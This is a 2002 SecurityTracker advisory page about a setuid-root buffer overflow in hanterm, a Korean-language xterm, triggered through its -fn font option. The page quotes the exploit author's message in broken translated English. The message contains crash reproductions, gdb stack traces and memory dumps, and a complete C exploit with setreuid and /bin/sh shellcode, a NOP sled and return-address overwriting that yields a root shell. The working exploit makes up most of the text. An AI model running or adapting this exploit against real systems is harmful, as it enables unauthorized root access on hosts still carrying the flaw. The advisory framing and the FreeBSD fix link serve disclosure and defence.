Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
(Exploit Details are Provided) Re: Hanterm Korean Language Xterm Utility Lets Local Users Compromise the System and Obtain Root Level Privileges
|
|
SecurityTracker Alert ID: 1003243 |
|
SecurityTracker URL: http://securitytracker.com/id/1003243
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 15 2002
|
Impact:
Execution of arbitrary code via local system, Root access via local system
|
Exploit Included: Yes
|
|
Description:
A vulnerability has been discovered in hanterm that allows local users to obtain root level privileges on the system.
It is reported that the hanterm binary is installed with set user id (setuid) root permissions. This allows local users to execute commands with root level privileges.
Exploit details and a demonstration exploit script are provided in the Source Message.
|
Impact:
A local user can execute commands with root level privileges, giving the local user root level access on the host.
|
Solution:
FreeBSD has released a fix for FreeBSD.
The FreeBSD advisory is available at:
http://security.freebsd.org/advisories/FreeBSD-SA-01:41.hanterm.asc
|
Cause:
Boundary error
|
Underlying OS:
Linux (Any), UNIX (Any)
|
|
Message History:
This archive entry is a follow-up to the message listed below.
|
Source Message Contents
|
Date: Wed, 09 Jan 2002 22:58:26 -0500
Subject: hanterm exploit
|
This is a multi-part message in MIME format.
--------------41D89979DE5B45562BE622B3
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
-------- Original Message --------
From: "you dong-hun" <szoahc@hotmail.com>
title: "XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm, xterm
Buffer
Overflow bug."
To discover already? I will not know well.
It tried to write the contents which I know.
It cannot English and it is sorry. T.T
It is like that, toil. ;-D
_________________________________________________________________
http://photos.msn.co.kr ¿¡¼ MSN Æ÷Å並 »ç¿ëÇÏ¸é ¿Â¶óÀÎ »ó¿¡¼ »çÁøÀ»
ÀμâÇÏ
°í ´Ù¸¥ »ç¶÷µé°ú °øÀ¯ÇÒ ¼öµµ ÀÖ½À´Ï´Ù.
--------------41D89979DE5B45562BE622B3
Content-Type: text/plain; charset=us-ascii;
name="hanterm,xterm.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="hanterm,xterm.txt"
XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm, xterm Buffer Overflow
bug.
The hanterm is the vt100/220 emulator where the Korean alphabet input-output
is possible from,
X Window environment. The Korean alphabet input-output from the
representative program which,
it does was not becoming international anger from X and window in order to
express the Korean alphabet from the application program which is
different that source boiled reference toy frequently.
Problem only only the hanterm knows exists even in the xterm.
The attack happens from fontname option.
When it uses -fn option,
contents of the Stack the authority acquisition of Overflow making option is
possible.
The hanterm and the xterm are the linux 7.x from default setuid set toy.
* Reference: hanterm-dev home page URL: http://elf.kaist.ac.kr/hanterm/
* Annual festival of easy attack:
X -version (1)
[x82@xpl017elz x82]$ X -version
XFree86 Version 3.3.5 / X Window System
(protocol Version 11, revision 0, vendor release 6300)
Release Date: August 23 1999
If the server is older than 6-12 months, or if your card is newer
than the above date, look for a newer version before reporting
problems. (see http://www.XFree86.Org/FAQ)
Operating System: Linux 2.2.12-20kr2smp i686 [ELF]
[x82@xpl017elz x82]$
hanterm:
[x82@xpl017elz x82]$ hanterm -display 61.xx.177.27:0 -fn `perl -e 'print
"x"x88'`
Segmentation fault
[x82@xpl017elz x82]$
xterm:
[x82@xpl017elz x82]$ xterm -display 61.37.177.27:0 -fn `perl -e 'print
"x"x99999'`
[x82@xpl017elz x82]$
There is not anyone problem.
X -version (2)
[x82@xpl017elz x82]$ X -version
XFree86 Version 4.0.2 / X Window System
(protocol Version 11, revision 0, vendor release 6400)
Release Date: 18 December 2000
If the server is older than 6-12 months, or if your card is
newer than the above date, look for a newer version before
reporting problems. (See http://www.XFree86.Org/FAQ)
Operating System: Linux 2.2.17-8krenterprise i686 [ELF]
Module Loader present
[x82@xpl017elz x82]$
hanterm:
[x82@xpl017elz x82]$ ls -la /usr/X11R6/bin/hanterm
-rwsr-xr-x 1 root root 169852 Oct 9 2000
/usr/X11R6/bin/hanterm
[x82@xpl017elz x82]$ hanterm -display 61.xx.177.27:0 -fn `perl -e 'print
"x"x112'`
Segmentation fault (core dumped)
[x82@xpl017elz x82]$
xterm:
[x82@xpl017elz x82]$ gdb -q xterm
(no debugging symbols found)...(gdb) r -display 61.xx.177.27:0 -fn `perl -e
'print "x"x326'`
Starting program: /usr/X11R6/bin/xterm -display 61.xx.177.27:0 -fn `perl -e
'print "x"x326'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x80552cb in strcpy () at ../sysdeps/generic/strcpy.c:31
31 ../sysdeps/generic/strcpy.c: No such file or directory.
(gdb) where
#0 0x80552cb in strcpy () at ../sysdeps/generic/strcpy.c:31
#1 0x5 in ?? ()
#2 0x400d75a3 in XtGetClassExtension () from /usr/X11R6/lib/libXt.so.6
#3 0x400d777e in XtGetClassExtension () from /usr/X11R6/lib/libXt.so.6
#4 0x400d7881 in XtRealizeWidget () from /usr/X11R6/lib/libXt.so.6
#5 0x8054819 in strcpy () at ../sysdeps/generic/strcpy.c:31
#6 0x806cba6 in strcpy () at ../sysdeps/generic/strcpy.c:31
#7 0x806c53a in strcpy () at ../sysdeps/generic/strcpy.c:31
#8 0x40281bfc in __libc_start_main (main=0x806bc20 <strcpy+128284>, argc=5,
ubp_av=0xbffff974, init=0x804b6ac <_init>, fini=0x806e64c <_fini>,
rtld_fini=0x4000d674 <_dl_fini>, stack_end=0xbffff96c)
at ../sysdeps/generic/libc-start.c:118
(gdb) q
The program is running. Exit anyway? (y or n) y
[x82@xpl017elz x82]$ ls -la /usr/X11R6/bin/xterm
-rwsr-xr-x 1 root root 224132 Jan 11 2001
/usr/X11R6/bin/xterm
[x82@xpl017elz x82]$
* /usr/X11R6/bin/hanterm overflow exploit:
=======================================
/*
**
** How to exploit?
**
** [x82@xpl017elz x82]$ cp /usr/X11R6/bin/hanterm .
** [x82@xpl017elz x82]$ gdb -q hanterm
** (no debugging symbols found)...(gdb) r -display 61.xx.177.27:0 -fn `perl
-e
** 'print "x"x80'`
**
** Starting program: /home/noname/hanterm -display 61.xx.177.27:0 -fn `perl
-e
** 'print "x"x80'`
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...(no debugging symbols found)...
** (no debugging symbols found)...
** Program received signal SIGSEGV, Segmentation fault.
** 0x80520e6 in strcpy () at ../sysdeps/generic/strcpy.c:30
** 30 ../sysdeps/generic/strcpy.c: ±×·± ÆÄÀÏÀ̳ª µð·ºÅ丮°¡ ¾øÀ½.
** (gdb) info reg $esp
** esp 0xbfffe6b8 -1073748296
** (gdb) x/80 0xbffffb00
** 0xbffffb00: 0x65746e61 0x2d006d72 0x70736964
0x0079616c
** 0xbffffb10: 0x332e3136 0x37312e37 0x37322e37
0x2d00303a
** 0xbffffb20: 0x78006e66 0x78787878 0x78787878
0x78787878
** 0xbffffb30: 0x78787878 0x78787878 0x78787878
0x78787878
** 0xbffffb40: 0x78787878 0x78787878 0x78787878
0x78787878
** 0xbffffb50: 0x78787878 0x78787878 0x78787878
0x78787878
** 0xbffffb60: 0x78787878 0x78787878 0x78787878
0x78787878
** 0xbffffb70: 0x00787878 0x5353454c 0x4e45504f
0x656c7c3d
** ... ... ... ... ...
** 0xbffffc10: 0x2d2a2d36 0x3563736b 0x2e313036
0x37383931
** 0xbffffc20: 0x2d2c302d 0x6f6b2d2a 0x2d676964
0x6964656d
** 0xbffffc30: 0x722d6d75 0x726f6e2d 0x2d6c616d
0x2d38312d
** (gdb)
**
** Buffer Structure
**
** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] =
88byte
**
** The return until the address the whole it contains and,
** it puts in an option.
**
** [x82@xpl017elz x82]$ ./exploit
**
** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
**
** Exploit made by Xpl017Elz
**
** Display HOST_IP: 255.255.255.255:0
** Jumping Address: 0xbffffb74
**
** Segmentation fault
** [x82@xpl017elz x82]$
**
** It calculates the offset.
** Namely, when 0xbffffb20 from 0xbffffb70 until it catches in between,
** it will be suitable.
**
** [x82@xpl017elz x82]$ ./exploit -a 61.xx.177.27:0 -o 2370 -b 88
**
** XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit
** Default: [ data addr ] + [ ebp addr ] + [ ret addr ] = 88byte
**
** Exploit made by Xpl017Elz
**
** Display HOST_IP: 61.xx.177.27:0
** Jumping Address: 0xbffffb26
**
** bash#
**
** Ooops! it's rootshell :-)
**
*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90
#define DFOFS 2400
#define DFIP "255.255.255.255:0"
#define DFBUF 88
/*
** [ data addr: 80byte ] + [ ebp addr: 4byte ] + [ ret addr: 4byte ] =
88byte
*/
char shellcode[] = /* 53byte shellcode */
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80" /* setreuid(0,0); */
"\xeb\x1d\x5e\x89\x76\x08\x31\xc0\x88\x46"
"\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd"
"\x80\xe8\xde\xff\xff\xff/bin/sh";
unsigned long sp(void) {
__asm__("movl %esp,%eax");
}
main(int argc, char *argv[]) {
int rufp, fpru, jobst,
ferbuf, num=DFBUF,
ofs=DFOFS;
long addr;
char buffer[2000],
hoip[] = DFIP;
extern char *optarg;
banrl();
while ((jobst = getopt(argc, argv, "a:o:b:")) !=EOF)
switch (jobst) {
case 'a': strcpy(hoip, optarg);
break;
case 'o': ofs = atoi(optarg);
break;
case 'b': num = atoi(optarg);
break;
case '?': usages(argv[0]);
exit(0);
}
printf(" Display HOST_IP: %s\n",hoip);
addr = sp() +ofs; // -ofs;
printf(" Jumping Address: %p\n\n",addr);
ferbuf = num - sizeof(shellcode) -4;
bzero(&buffer,2000);
for(rufp=0; rufp<=ferbuf; rufp++) {
buffer[rufp] = NOP;
}
for(fpru=0; fpru<=52; fpru++) {
buffer[rufp++] = shellcode[fpru];
}
buffer[rufp++] = addr & 0xff;
buffer[rufp++] = addr>> 8 & 0xff;
buffer[rufp++] = addr>>16 & 0xff;
buffer[rufp++] = addr>>24 & 0xff;
execl("/usr/X11R6/bin/hanterm", "hanterm",
"-display", hoip, "-fn", buffer, NULL);
exit(0);
}
usages(char *var) {
printf("\n Usage:\n
%s -a [host_ip:0] -o [offset] -b [buffer size] (data addr~ return
addr)\n",var);
printf(" Default: %s -a 61.xx.177.27:0 -o 2400 -b 88\n\n",var);
}
banrl() {
printf("\n XFree86 Version 3.x.x ~ 4.x.x /usr/X11R6/bin/hanterm exploit\n");
printf(" Default: [ data addr ] + [ ebp addr ] + [ ret addr ] =
88byte\n\n");
printf("\t\t\t Exploit made by Xpl017Elz\n\n");
}
_end of
file_=====================================================================
Found long ago. :-]
However, it was not done how much that do exploit to heighten batting
average.
Decide and attack buffer that is input through simple option.
That cover through offset & shellcode address decide can.
That succeed to exploit by all means ...
Author: Xpl017Elz
E-mail: szoahc@hotmail.com & xploit@hackermail.com
Home: http://x82.i21c.net
P.S: Always so ...
Sorry. I gave up original English.
Study English since next time. So, make understood other people.
Thank you for reading unwise writing. ^-^*
--------------41D89979DE5B45562BE622B3--
|
|
Go to the Top of This SecurityTracker Archive Page
|
